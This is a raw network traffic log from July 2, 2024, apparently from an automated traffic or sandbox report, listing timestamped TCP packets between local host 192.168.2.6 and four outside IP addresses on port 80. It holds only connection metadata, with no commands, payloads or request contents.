                                                          Jul 2, 2024 14:04:58.824126005 CEST4975480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:58.828634977 CEST4975480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:58.834156990 CEST80497543.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:58.834187984 CEST80497543.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:59.313087940 CEST80497543.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:59.313257933 CEST4975480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:00.331186056 CEST4975480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:00.336133003 CEST80497543.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:01.350438118 CEST4975580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:01.355314016 CEST80497553.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:01.355402946 CEST4975580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:01.357569933 CEST4975580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:01.362379074 CEST80497553.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:01.825535059 CEST80497553.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:01.825612068 CEST80497553.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:01.825983047 CEST4975580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:01.831067085 CEST4975580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:01.835912943 CEST80497553.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:07.138763905 CEST4975680192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:07.143594027 CEST804975687.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:07.143667936 CEST4975680192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:07.146040916 CEST4975680192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:07.151015043 CEST804975687.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:07.903883934 CEST804975687.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:07.903908014 CEST804975687.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:07.911093950 CEST4975680192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:08.658957958 CEST4975680192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:09.679044008 CEST4975780192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:09.683892012 CEST804975787.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:09.688976049 CEST4975780192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:09.688976049 CEST4975780192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:09.694431067 CEST804975787.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:10.440665960 CEST804975787.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:10.440690994 CEST804975787.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:10.443095922 CEST4975780192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:11.190275908 CEST4975780192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:12.211035013 CEST4975880192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:12.216000080 CEST804975887.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:12.216183901 CEST4975880192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:12.219038963 CEST4975880192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:12.223906040 CEST804975887.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:12.223985910 CEST804975887.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:13.036138058 CEST804975887.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:13.036212921 CEST804975887.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:13.036259890 CEST4975880192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:13.725080013 CEST4975880192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:14.818425894 CEST4975980192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:14.823517084 CEST804975987.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:14.823606968 CEST4975980192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:14.826283932 CEST4975980192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:14.833596945 CEST804975987.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:15.585630894 CEST804975987.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:15.586508036 CEST804975987.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:15.586563110 CEST4975980192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:15.589471102 CEST4975980192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:15.594301939 CEST804975987.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:20.683682919 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:20.688575029 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:20.688635111 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:20.690686941 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:20.695486069 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.698502064 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.698524952 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.698544979 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.698555946 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.698565006 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.698576927 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.698586941 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.698604107 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.698697090 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.698721886 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.698721886 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.698734999 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.701240063 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.703478098 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.703490019 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.703560114 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.806910992 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.806927919 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.806940079 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.807029963 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.807205915 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.809108973 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.811693907 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.811706066 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.811763048 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.813982964 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.814104080 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.816461086 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.816472054 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.816497087 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.816538095 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.818712950 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.818725109 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.818782091 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.821258068 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.821270943 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.821346998 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.823625088 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.823637962 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.823648930 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.823683023 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.823714018 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.826153994 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.826168060 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.826422930 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.828466892 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.828479052 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.828502893 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.828602076 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.898085117 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.898102999 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.898114920 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.898205042 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.915673018 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.915829897 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.915842056 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.915853024 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.915863037 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.915874004 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.915885925 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.915900946 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.915935993 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.915968895 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.915980101 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.917094946 CEST8049760135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:21.917185068 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:21.917185068 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:22.210231066 CEST4976080192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:23.225099087 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:23.230007887 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:23.230072975 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:23.232096910 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:23.238579988 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.248224974 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.248255014 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.248266935 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.248294115 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.248307943 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.248346090 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:24.248379946 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:24.248651981 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.248727083 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.248884916 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.248893976 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.248903990 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:24.248987913 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.248997927 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:24.249151945 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:24.253231049 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.253289938 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.253302097 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.253344059 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.253357887 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:24.253405094 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:24.356987000 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.357002974 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.357014894 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.357026100 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.357038021 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.357049942 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.357202053 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:24.357229948 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.357302904 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.357314110 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.357367039 CEST4976180192.168.2.6135.181.212.206
                                                          Jul 2, 2024 14:05:24.357500076 CEST8049761135.181.212.206192.168.2.6
                                                          Jul 2, 2024 14:05:24.357568979 CEST4976180192.168.2.6135.181.212.206
Jul 2, 2024 14:05:24.357892036 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.357903004 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.357916117 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.357970953 CEST | 49761 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:24.358040094 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.358052969 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.358062983 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.358110905 CEST | 49761 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:24.358167887 CEST | 49761 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:24.358815908 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.358861923 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.358872890 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.358913898 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.359009027 CEST | 49761 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:24.359347105 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.359405041 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.359416008 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.359622002 CEST | 49761 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:24.385166883 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.385200024 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.385211945 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.388425112 CEST | 49761 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:24.464210987 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.464394093 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.464405060 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.464416981 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.464426994 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.464437008 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.464449883 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.464580059 CEST | 49761 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:24.464600086 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.464659929 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.464735031 CEST | 49761 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:24.464740038 CEST | 80 | 49761 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:24.464870930 CEST | 49761 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:24.737086058 CEST | 49761 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:25.756107092 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:25.761053085 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:25.761392117 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:25.763303995 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:25.768259048 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:25.768269062 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.733534098 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.733551025 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.733562946 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.733614922 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.733653069 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.733665943 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.733676910 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.733689070 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.733696938 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.733712912 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.733774900 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.733812094 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.733836889 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.733848095 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.733891010 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.738569975 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.738607883 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.738620043 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.738650084 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.783870935 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.841640949 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.841684103 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.841696024 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.841732025 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.841783047 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.841794968 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.841829062 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.842046022 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.842084885 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.842106104 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.842118025 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.842154026 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.842191935 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.842202902 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.842241049 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.843389034 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.843467951 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.843478918 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.843509912 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.843545914 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.843556881 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.843586922 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.843931913 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.843980074 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.844012022 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.844022989 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.844063044 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.844091892 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.844101906 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.844137907 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.844696999 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.844806910 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.844818115 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.844845057 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.846664906 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.846710920 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.846748114 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.893250942 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.954777002 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.954792023 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.954803944 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.954833984 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.954895973 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.954906940 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.954919100 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.954930067 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.954936028 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.954946041 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.954957962 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.954966068 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.954973936 CEST | 80 | 49762 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:26.954998016 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:26.955017090 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:27.268870115 CEST | 49762 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:28.287018061 CEST | 49763 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:28.292462111 CEST | 80 | 49763 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:28.296564102 CEST | 49763 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:28.296564102 CEST | 49763 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:28.301358938 CEST | 80 | 49763 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:29.317720890 CEST | 80 | 49763 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:29.317810059 CEST | 80 | 49763 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:29.317872047 CEST | 49763 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:29.320868015 CEST | 49763 | 80 | 192.168.2.6 | 135.181.212.206
Jul 2, 2024 14:05:29.325727940 CEST | 80 | 49763 | 135.181.212.206 | 192.168.2.6
Jul 2, 2024 14:05:35.159234047 CEST | 49764 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:35.163995981 CEST | 80 | 49764 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:35.164052963 CEST | 49764 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:35.166114092 CEST | 49764 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:35.170914888 CEST | 80 | 49764 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:35.864717007 CEST | 80 | 49764 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:35.864824057 CEST | 80 | 49764 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:35.864999056 CEST | 49764 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:36.674638033 CEST | 49764 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:37.697253942 CEST | 49766 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:37.702378035 CEST | 80 | 49766 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:37.702639103 CEST | 49766 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:37.704380035 CEST | 49766 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:37.709177017 CEST | 80 | 49766 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:38.413938999 CEST | 80 | 49766 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:38.414580107 CEST | 80 | 49766 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:38.417136908 CEST | 49766 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:39.206069946 CEST | 49766 | 80 | 192.168.2.6 | 191.6.208.133
